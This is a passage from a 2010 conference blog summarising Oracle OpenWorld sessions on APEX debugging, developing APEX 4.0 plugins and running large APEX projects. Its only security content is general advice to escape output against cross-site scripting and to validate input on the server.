The DBA_HIST_* views are where the historic data is located.

Tom continued by discussing the metrics and the time model and how to join them to get data about them. However, all his presentations are available for everyone and you're better off reading them on his site than getting a summary here.

As usual, Tom places his presentations and other things under files on asktom.

The next presentation was APEX debugging and tracing with Doug Gault from Sumneva.

Debug mode is turned off at the application level by default. It needs to be enabled there before it can be used.

Debug data is now written to a table, and not dumped on the webpage as before. It is viewed by clicking view debug in the developer bar in the APEX interface.

Use conditional display to output things only in debug mode (using v('DEBUG')).

Things that happen on a page after it has been rendered will not be captured, for example JavaScript running on the client.

APEX_DEBUG_MESSAGE is currently undocumented, but the code shows how to use it.

Debugging can be turned on/off on the page programmatically.

Logging from your own code allows you to see which parts of a package call take the time.

Doug then showed a few different ways to collect and report on the debug data for a report.

I recommend looking at the presentation for ideas on how to use it and what can be done. Unfortunately this presentation does not seem to be available on the Sumneva website at this point. If you are interested in it, send an email to them asking if they are willing to share it on their presentation page. You'd of course want to check their site first to make sure it isn't uploaded between the time I write this and the time you read it.

Posted in APEX, OOW, Oracle, Performance, SQL

September 23rd, 2010 by mathias

Wednesday starts off with a presentation about a new feature in APEX 4.0 that I have not had a chance to look into: how you use and develop plugins. The presentation was held by Patrick Wolf, who is also the developer of the plugin feature.

Patrick began by showing how a plugin is used (that is, using a plugin compared to developing one).

You install a plugin by selecting plugins in the shared components section, and then it is just a standard APEX import.

Using a plugin has the benefit that it is declarative, while using JavaScript directly requires code changes and explicit inclusion of the necessary code on every page it is used on.

Once installed, the use of it is identical to using other supplied item types in APEX. It is like the plugin was part of the product.

The productivity is much better than with just using JavaScript, as once you have the plugin it is just a matter of selecting it to be used, and not having to change code to match what you need.

There are already many plugins available and more are added all the time.

Patrick recommends starting by finding a jQuery plugin that performs the action you want and then trying it out on a static HTML page. When that works, you're ready to create an APEX plugin for it.

When developing an APEX plugin, you need to follow certain API guidelines to make sure your functions have the signatures they are expected to have.

Patrick then moved on to showing how a plugin is developed.

You create your plugin in shared components and then it is a matter of providing calls to the PL/SQL code you write to generate the HTML and other things that are needed.

Patrick finished up with some recommendations for developing plugins, and they are similar to what you would expect in any web-oriented technology.

Always escape all data, both from the database and from the browser. Not doing that opens a risk of cross-site scripting attacks. There is a function available for this, I believe it is sys.htf_escape_cs (possible typo as I wrote it from memory after he moved on to his next slide).

Reference apex.jquery in the code to make sure the APEX-supplied version of jQuery is used.

Do not trust client-side checks on data, as they can easily be overridden. The same checks have to be performed on the server side as well.

Look at Oracle's best practice plugins to get a feeling for what to do and how to do it. They have lots of comments to guide you.

Use the packages apex_plugin_util, apex_javascript, apex_css.

Test your plugins with more than one item using them on a page.

Patrick recommends avoiding inline CSS and JavaScript when it becomes a lot, to make sure the page loads faster.

Patrick finished up with reminding us to share plugins when it is possible to do so.

The only other presentation for the morning was a hands-on allowing the participants to repeat the steps that Patrick had just done. As with many hands-on exercises it was too much of following a set of steps with instructions to click here or there and to type this or that into different places. Though useful, it is not creative enough to allow me to fully understand the process. That can however be done some other time when I have a need to develop a real plugin.

Posted in APEX, OOW, Oracle

September 22nd, 2010 by mathias

The afternoon was kicked off with a presentation on using APEX in large projects by Dimitri Gielis. These are my notes from what Dimitri told us.

Many people feel that APEX cannot be used for anything larger than a single developer's app.

Sumneva uses EC2 for both demo and development work with their clients.

They have ready-made scripts to create new projects that set up filesystem directories, the APEX application, and Subversion.

They're finding that the agile project methodology works very well for APEX-projects.

To automate testing, they're using Selenium. I find the number of times this product was mentioned at OOW interesting. It is a product we have on the list of technologies to know/learn at work, but most people I've talked with have not been aware of it. I guess it differs between markets, and it may also be a tool that more advanced web developers are more familiar with.

To check consistency in a large project with many developers, they recommend using the APEX Advisor to get a report on things to look into.

Sumneva has created their own PM tool to track tickets with. It is aware of APEX-specific things such as the URL to the app and the alias of the app.

Using the feedback features to collect data from the users works very well for them in their projects. They use the provided features when possible, and a custom version, which lets the users log data into an application on their servers, when they cannot access the production environments.

Tools they find useful include:

  • Selenium
  • Firebug
  • SQL Developer
  • Subversion
  • Jira or other ticketing system
  • Reusable APEX components
  • Publish defaults to apps via a master app
  • Use interface defaults

While the presentation didn't really tell me what it takes on the technical side to run a large project, it was clear that it is very possible. But, as with all large projects it requires planning for both functional and technical aspects of the project.

The next presentation was about moving from mod_plsql in Oracle E-Business Suite to APEX. The reason it is needed is that mod_plsql is not supported in the latest version of E-Business Suite.

Unfortunately the presentation focused so much on their particular solution and the specifics of what they needed that it was hard to extract any APEX-specific knowledge from it. Most of the presentation centered on the fact that they wanted SSO between E-Business Suite and the APEX application, and how they needed links from E-Business Suite to the APEX application so it felt like one application for the end users. They succeeded with that, but the presentation did not provide enough detail about what they did or even what the main hurdles they encountered were.

Posted in APEX, OOW, Oracle